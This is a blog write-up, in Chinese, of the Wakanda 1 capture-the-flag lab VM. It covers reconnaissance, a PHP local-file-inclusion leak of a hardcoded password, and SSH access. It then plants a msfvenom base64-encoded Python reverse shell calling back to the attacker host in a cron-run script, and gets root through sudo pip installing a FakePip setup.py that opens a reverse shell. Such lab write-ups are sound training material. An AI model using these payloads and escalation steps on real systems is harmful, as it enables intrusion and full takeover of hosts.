Write-Up-wakanda-1

关于

祖传开头

信息收集

  • 这里用vm虚拟机可能有一点问题,因为官方的是用vbox虚拟机导出的镜像文件。所以这次使用vbox虚拟机。
➜  ~ ip a show dev vboxnet0 
6: vboxnet0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 0a:00:27:00:00:00 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.1/24 brd 192.168.56.255 scope global vboxnet0
       valid_lft forever preferred_lft forever
    inet6 fe80::800:27ff:fe00:0/64 scope link 
       valid_lft forever preferred_lft forever
➜  ~ nmap -sn 192.168.56.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-16 20:00 CST
Nmap scan report for 192.168.56.1
Host is up (0.0011s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00057s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.77 seconds

  • IP是192.168.56.101,除了开放了RPC服务和以前的没什么太大的变化。从Web入手。
➜  ~ nmap -T4 -A 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-16 20:01 CST
Nmap scan report for 192.168.56.101
Host is up (0.0023s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Vibranium Market
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          40326/tcp  status
|_  100024  1          54014/udp  status
3333/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 1c:98:47:56:fc:b8:14:08:8f:93:ca:36:44:7f:ea:7a (DSA)
|   2048 f1:d5:04:78:d3:3a:9b:dc:13:df:0f:5f:7f:fb:f4:26 (RSA)
|   256 d8:34:41:5d:9b:fe:51:bc:c6:4e:02:14:5e:e1:08:c5 (ECDSA)
|_  256 0e:f5:8d:29:3c:73:57:c7:38:08:6d:50:84:b6:6c:27 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds

  • 主页是一个单页,扫一顿也没发现什么。但是F12发现了<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->,访问http://192.168.56.101/?lang=fr时主页多了一写东西。猜想这是切换语言是要包含本地文件,所以就试了试。发现存在LFI漏洞。和以前的pwnlab_init套路一样。
➜  ~ nikto -h http://192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2018-10-16 20:06:38 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2018-10-16 20:06:57 (GMT8) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
➜  ~ dirb http://192.168.56.101/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Oct 16 20:07:03 2018
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/admin (CODE:200|SIZE:0)                                       
+ http://192.168.56.101/backup (CODE:200|SIZE:0)                                     
+ http://192.168.56.101/index.php (CODE:200|SIZE:1527)                               
+ http://192.168.56.101/secret (CODE:200|SIZE:0)                                     
+ http://192.168.56.101/server-status (CODE:403|SIZE:302)                             
+ http://192.168.56.101/shell (CODE:200|SIZE:0)                                       
-----------------
END_TIME: Tue Oct 16 20:07:05 2018
DOWNLOADED: 4612 - FOUND: 6
➜  ~ 

利用LFI漏洞

  • 利用php://filter/convert.base64-encode/resource获取inde页面的源码再base64解码。
➜ ~ curl "http://192.168.56.101/?lang=php://filter/convert.base64-encode/resource=index"
PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=

登录SSH

  • 在源码里找到了$password ="Niamey4Ever227!!!" ;//I have to remember it,密码找到了,有在主页里找到了Made by[@mamadou](http://192.168.56.101/#)所以用户名是mamadou。登录ssh。
➜  ~ ssh mamadou@192.168.56.101 -p 3333
The authenticity of host '[192.168.56.101]:3333 ([192.168.56.101]:3333)' can't be established.
ECDSA key fingerprint is SHA256:X+fXjgH34Ta5l6I4kUSpiVZNBGGBGtjxZxgyU7KCFwk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.56.101]:3333' (ECDSA) to the list of known hosts.
mamadou@192.168.56.101's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Aug  3 15:53:29 2018 from 192.168.56.1
Python 2.7.9 (default, Jun 29 2016, 13:08:31) 
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> 

  • 但是发现这并不是系统的bash shell而是一个Python的交互命令行。这好办,都不用我输入python -c 'import pty;pty.spawn("/bin/bash")',第一个Flag到手。
Python 2.7.9 (default, Jun 29 2016, 13:08:31) 
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import pty
>>> pty.spawn("/bin/bash")
mamadou@Wakanda1:~$ id
uid=1000(mamadou) gid=1000(mamadou) groups=1000(mamadou)
mamadou@Wakanda1:~$ 
mamadou@Wakanda1:~$ ls
flag1.txt
mamadou@Wakanda1:~$ cat flag1.txt 

Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc
mamadou@Wakanda1:~$ 
  • 在tmp目录发现一个devops用户的一个test文件。
mamadou@Wakanda1:/tmp$ ls -al
total 32
drwxrwxrwt  7 root   root      4096 Oct 16 08:28 .
drwxr-xr-x 22 root   root      4096 Aug  1 13:05 ..
drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .font-unix
drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .ICE-unix
-rw-r--r--  1 devops developer    4 Oct 16 08:24 test
drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .Test-unix
drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .X11-unix
drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .XIM-unix
mamadou@Wakanda1:/tmp$ 

  • 搜索所以属于devops的文件,发现了一个.antivirus.py文件,然后我又回去看了一下test文件,发现更新时间一直再变,那就有可能是上面的py是会隔一段时间就会执行的。
mamadou@Wakanda1:/tmp$ find / -user devops 2>/dev/null
/srv/.antivirus.py
/tmp/test
/home/devops
/home/devops/.bashrc
/home/devops/.profile
/home/devops/.bash_logout
/home/devops/flag2.txt
mamadou@Wakanda1:/tmp$ 

mamadou@Wakanda1:/srv$ cat .antivirus.py 
open('/tmp/test','w').write('test')
mamadou@Wakanda1:/srv$ ls -la
total 12
drwxr-xr-x  2 root   root      4096 Aug  1 17:52 .
drwxr-xr-x 22 root   root      4096 Aug  1 13:05 ..
-rw-r--rw-  1 devops developer   36 Aug  1 20:08 .antivirus.py
mamadou@Wakanda1:/srv$ 
mamadou@Wakanda1:/tmp$ ls -al
total 32
drwxrwxrwt  7 root   root      4096 Oct 16 08:39 .
drwxr-xr-x 22 root   root      4096 Aug  1 13:05 ..
drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .font-unix
drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .ICE-unix
-rw-r--r--  1 devops developer    4 Oct 16 08:39 test
drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .Test-unix
drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .X11-unix
drwxrwxrwt  2 root   root      4096 Oct 16 07:49 .XIM-unix

  • 生成msf的Python反弹后门,把代码复制到.antivirus.py 里打开msf监听7777端口坐等shell。
➜  ~ msfvenom -p cmd/unix/reverse_python lhost=192.168.56.1 lport=7788 formats py R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 537 bytes
python -c "exec('aW1wb3J0IHNvY2tldCwgICAgICBzdWJwcm9jZXNzLCAgICAgIG9zICAgIDsgICAgICAgICBob3N0PSIxOTIuMTY4LjU2LjEiICAgIDsgICAgICAgICBwb3J0PTc3ODggICAgOyAgICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgICAgICBzb2NrZXQuU09DS19TVFJFQU0pICAgIDsgICAgICAgICBzLmNvbm5lY3QoKGhvc3QsICAgICAgcG9ydCkpICAgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksICAgICAgMCkgICAgOyAgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgICAgICAxKSAgICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAgICAgIDIpICAgIDsgICAgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"
  • 经过漫长的等待,shell终于弹回来了。第二个Flag到手。
➜  ~ nc -lvp 7788
Connection from 192.168.56.101:50517
id
uid=1001(devops) gid=1002(developer) groups=1002(developer)
python -c 'import pty;pty.spawn("/bin/bash")'
devops@Wakanda1:/$ cd ~
cd ~
devops@Wakanda1:~$ ls
ls
flag2.txt

devops@Wakanda1:~$ cat flag2.txt
cat flag2.txt
Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
devops@Wakanda1:~$ 

FakePip提权

  • pip可以用sudo而且不用输入密码。
devops@Wakanda1:~$ sudo -l
sudo -l
Matching Defaults entries for devops on Wakanda1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User devops may run the following commands on Wakanda1:
    (ALL) NOPASSWD: /usr/bin/pip
devops@Wakanda1:~$ 
  • 项目地址:点我,打开setup.py文件把里面的IP改了就可以了。项目里也有详细的教程。
➜  FakePip git:(master) ✗ php -S 0.0.0.0:4444
PHP 7.2.10 Development Server started at Tue Oct 16 21:40:47 2018
Listening on http://0.0.0.0:4444
Document root is /home/kali-team/GitHub/FakePip
Press Ctrl-C to quit.
[Tue Oct 16 21:41:37 2018] 192.168.56.101:45377 [200]: /setup.py


devops@Wakanda1:~$ wget http://192.168.56.1:4444/setup.py
wget http://192.168.56.1:4444/setup.py
--2018-10-16 09:41:36--  http://192.168.56.1:4444/setup.py
Connecting to 192.168.56.1:4444... connected.
HTTP request sent, awaiting response... 200 OK
Length: 990 [application/octet-stream]
Saving to: ‘setup.py’

setup.py            100%[=====================>]     990  --.-KB/s   in 0s     

2018-10-16 09:41:36 (81.4 MB/s) - ‘setup.py’ saved [990/990]

devops@Wakanda1:~$ ls
ls
flag2.txt  setup.py

  • 按照项目教程执行pip安装,再用nc监听等shell。
devops@Wakanda1:~$ sudo /usr/bin/pip install . --upgrade --force-reinstall
sudo /usr/bin/pip install . --upgrade --force-reinstall
Unpacking /home/devops
  Running setup.py (path:/tmp/pip-SfNBak-build/setup.py) egg_info for package from file:///home/devops
    
Installing collected packages: FakePip
  Found existing installation: FakePip 0.0.1
    Uninstalling FakePip:
      Successfully uninstalled FakePip
  Running setup.py install for FakePip

  • root的Flag到手。
➜  FakePip git:(master) ✗ nc -lvp 6666
Connection from 192.168.56.101:46577
root@Wakanda1:/tmp/pip-SfNBak-build# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Wakanda1:/tmp/pip-SfNBak-build# cd    	
cd
root@Wakanda1:~# ls
ls
root.txt
root@Wakanda1:~# cat root.txt
cat root.txt
 _    _.--.____.--._
( )=.-":;:;:;;':;:;:;"-._
 \\\:;:;:;:;:;;:;::;:;:;:\
  \\\:;:;:;:;:;;:;:;:;:;:;\
   \\\:;::;:;:;:;:;::;:;:;:\
    \\\:;:;:;:;:;;:;::;:;:;:\
     \\\:;::;:;:;:;:;::;:;:;:\
      \\\;;:;:_:--:_:_:--:_;:;\
       \\\_.-"             "-._\
        \\
         \\
          \\
           \\ Wakanda 1 - by @xMagass
            \\
             \\


Congratulations You are Root!

821ae63dbe0c573eff8b69d451fb21bc

root@Wakanda1:~# 

posted @ 2020-01-19 08:59  三米前有蕉皮  阅读(...)  评论(...编辑  收藏